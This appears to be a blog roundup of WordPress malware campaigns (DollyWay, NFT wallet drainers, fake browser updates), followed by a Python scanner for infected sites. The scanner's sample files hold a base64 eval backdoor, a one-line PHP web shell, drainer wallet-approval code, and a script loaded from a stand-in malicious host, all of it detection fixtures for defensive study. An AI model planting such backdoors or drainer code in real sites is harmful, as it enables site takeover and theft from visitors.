Malware Operation ‘DollyWay’ Hacked 20,000+ WordPress Sites Globally

Ankit Agarwal

Growth Hacker

March 20, 2025 4 min read

DollyWay is a long-running malware campaign that has compromised over 20,000 WordPress sites worldwide. The operation keeps tight control of the sites it infects and injects code that redirects visitors to scam pages through traffic broker networks. The campaign is linked to VexTrio, a large cybercriminal affiliate network that relies on DNS techniques and domain generation algorithms. Early DollyWay payloads included ransomware and banking trojans; the current version concentrates on redirects. Researchers at GoDaddy documented its mechanisms, including cryptographic verification of the data it exchanges with its infrastructure and an automated reinfection process. DollyWay also updates WordPress and removes competing malware so that it alone retains control of an infected site, which is why protecting a WordPress site calls for continuous integrity monitoring rather than a one-off cleanup.

DollyWay’s Infrastructure

DollyWay v3 operates through a distributed network of command and control (C2) and traffic direction system (TDS) nodes. Compromised WordPress sites host the redirect scripts, which are injected through files such as wp-content/counts.php. The malware refreshes its node list daily, so it keeps working even when some nodes are taken down. The injected code carries a unique hexadecimal string, so no single fixed signature matches every infected site. DollyWay maintains persistence by disabling security plugins and reinstalling itself every time a page is loaded, which means a partial cleanup is undone on the next request. Analysts noted that the reinfection routine randomizes the injected code, making removal difficult unless the site is taken offline and cleaned in one pass. DollyWay also plants backdoors that permit arbitrary PHP code execution, and it checks cryptographic signatures on the data it receives so that node lists and payloads cannot be tampered with. These techniques show how the campaign has adapted over nearly a decade to stay effective against evolving security practices.

Over 2,000 Hacked WordPress Websites Infected with Crypto-Draining Malware

Threat actors have compromised over 2,000 WordPress websites and turned them into crypto-draining portals. The affected sites now promote rogue NFT deals that entice visitors to connect their wallets, and the same drainer kits are also pushed through YouTube and malvertising. The campaign evolved from an earlier phase in which injected scripts weaponized visitors' browsers as distributed brute-forcing tools that probed admin passwords at other WordPress sites. The attackers then revamped the compromised sites to display fake NFT discounts and crypto offers. Once the malicious script runs, it generates fake pop-ups that prompt the user to link a crypto wallet; if the user approves, the wallet's funds and NFTs are transferred to attacker-controlled wallets. Consumer security suites such as Bitdefender Ultimate Security filter known phishing and scam pages, and understanding how crypto scams work helps users recognize a wallet-connect prompt they did not initiate.

Cybersecurity Vulnerabilities and Exploits

The Cybersecurity and Infrastructure Security Agency (CISA) has warned of multiple vulnerabilities being exploited in attacks, including a critical flaw in SAP NetWeaver and a vulnerability in Edimax IP cameras. Organizations are urged to patch promptly to reduce their exposure. A new ransomware-as-a-service (RaaS) operation called 'Dragon' has also emerged, with notable initial-access and exploitation methods. CISA has likewise issued advisories for actively exploited vulnerabilities in NAKIVO Backup and Replication. With tax season approaching, scammers are intensifying their efforts against unsuspecting taxpayers. Organizations should remain vigilant and keep patching and monitoring on schedule to counter these ongoing threats.

Hacked WordPress Sites Pushing Malware

Hackers are exploiting outdated versions of WordPress core and plugins to distribute malware targeting both Windows and macOS users; the campaign has affected over 10,000 websites. The attackers alter page content to display fake update prompts that lead visitors to download malicious files posing as legitimate browser updates. The payloads are AMOS (Atomic macOS Stealer) for macOS and SocGholish for Windows, both used to capture sensitive data such as passwords and crypto wallets. Security researchers recommend downloading software only from trusted sources and keeping WordPress, its plugins and endpoints updated. The prevalence of password-stealing malware is reflected in recent large data breaches, underlining the need for continuous security vigilance.
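The three WordPress stories above describe what an infected site looks like on disk: a loader dropped at wp-content/counts.php carrying a unique hex string (DollyWay), pages that call wallet RPC methods to drain NFTs, and injected script tags that serve fake browser-update prompts. As an added example, not tooling from GoDaddy, Sucuri or any vendor named on this page, the following Python script does a first-pass triage of a WordPress document root for those kinds of indicators. Only the wp-content/counts.php path comes from the article; the remaining heuristics (PHP under upload directories, an eval/base64 loader next to a 32+ character hex run, the wallet method names, script tags loading from hosts outside an allowlist), the sample files and the .test/.invalid hostnames are assumptions of this example, constructed in a temporary directory so it runs offline.

```python
"""Triage scan of a WordPress document root for web-malware indicators.

Added example, not tooling from GoDaddy, Sucuri, or any vendor named on
this page. Only the wp-content/counts.php path comes from the DollyWay
write-up; every other heuristic and all sample data are assumptions.
"""
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Injection vehicle named in the DollyWay section (from the article).
DOLLYWAY_PATHS = ("wp-content/counts.php",)

# Directories where PHP should never execute on a healthy install (assumed).
NO_PHP_DIRS = ("wp-content/uploads/", "wp-content/cache/")

# Obfuscated loader followed within 200 chars by a 32+ char hex token. The
# article says the injected hex string is unique, so we match the shape
# (loader + hex run) rather than any fixed value (assumed heuristic).
HEX_LOADER_RE = re.compile(
    r"(eval|base64_decode|gzinflate)\s*\(.{0,200}?[0-9a-f]{32,}", re.I | re.S)

# Wallet RPC / ERC-721 calls a drainer page needs. Legitimate dApps use them
# too, so a hit is a lead to review, not a verdict (assumed heuristic).
DRAINER_TOKENS = ("eth_requestAccounts", "eth_sendTransaction",
                  "setApprovalForAll", "personal_sign")

SCRIPT_SRC_RE = re.compile(r"""<script[^>]+src\s*=\s*["']([^"']+)["']""", re.I)
TEXT_SUFFIXES = {".php", ".js", ".html", ".htm"}


def scan_site(root, allowed_script_hosts=()):
    """Walk `root` and return sorted (relative_path, finding) tuples."""
    root = Path(root)
    findings = set()
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if rel in DOLLYWAY_PATHS:
            findings.add((rel, "dollyway-injection-file"))
        if rel.endswith(".php") and rel.startswith(NO_PHP_DIRS):
            findings.add((rel, "php-in-upload-dir"))
        if path.suffix.lower() not in TEXT_SUFFIXES:
            continue
        text = path.read_text(errors="replace")
        if HEX_LOADER_RE.search(text):
            findings.add((rel, "obfuscated-loader-with-hex-token"))
        if any(tok in text for tok in DRAINER_TOKENS):
            findings.add((rel, "wallet-drainer-rpc-calls"))
        for src in SCRIPT_SRC_RE.findall(text):
            host = urlparse(src).hostname
            if host and host not in allowed_script_hosts:
                findings.add((rel, "external-script:" + host))
    return sorted(findings)


# Constructed sample tree: two clean files and four planted indicators.
# Hostnames use reserved .test/.invalid TLDs; nothing here is a real IOC.
SAMPLE_FILES = {
    "index.php": "<?php require __DIR__ . '/wp-blog-header.php';\n",
    "wp-content/themes/twentytwentyfour/header.php":
        '<script src="https://static.example.test/app.js"></script>\n',
    "wp-content/counts.php":
        "<?php if (isset($_POST['5d41402abc4b2a76b9719d911017c592'])) {"
        " eval(base64_decode($_POST['5d41402abc4b2a76b9719d911017c592'])); }\n",
    "wp-content/uploads/2025/03/cache.php": "<?php @system($_GET['c']);\n",
    "wp-content/uploads/2025/03/wallet.js":
        "const [owner] = await window.ethereum.request({method:'eth_requestAccounts'});\n"
        "await nft.setApprovalForAll(ATTACKER, true);\n",
    "wp-content/themes/twentytwentyfour/footer.php":
        '<script src="https://update.bad.invalid/chrome-update.js"></script>\n',
}


def build_sample_site(root):
    """Write SAMPLE_FILES under root, creating directories as needed."""
    for rel, body in SAMPLE_FILES.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)


def run_demo():
    """Build the sample site in a temp dir and return the scan findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        return scan_site(tmp, allowed_script_hosts=("static.example.test",))


if __name__ == "__main__":
    for rel, finding in run_demo():
        print(f"{finding:40s} {rel}")
```

On the constructed tree the scan reports five findings: counts.php is flagged twice (by path and by its loader-plus-hex shape), the PHP dropped under uploads once, the wallet script once, and the footer that loads a script from an unlisted host once, while the clean index.php and the header that loads from the allowlisted host are silent. Because DollyWay reinfects on every page load, run a scan like this against a copy taken with the site offline, then again after cleanup, rather than trusting a single pass on a live site.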


Ankit Agarwal, Growth Hacker: growth strategist who cracked the code on 18% conversion rates from SEO portals versus 0.5% from traditional content, specializing in turning cybersecurity companies into organic traffic magnets through data-driven portal optimization.
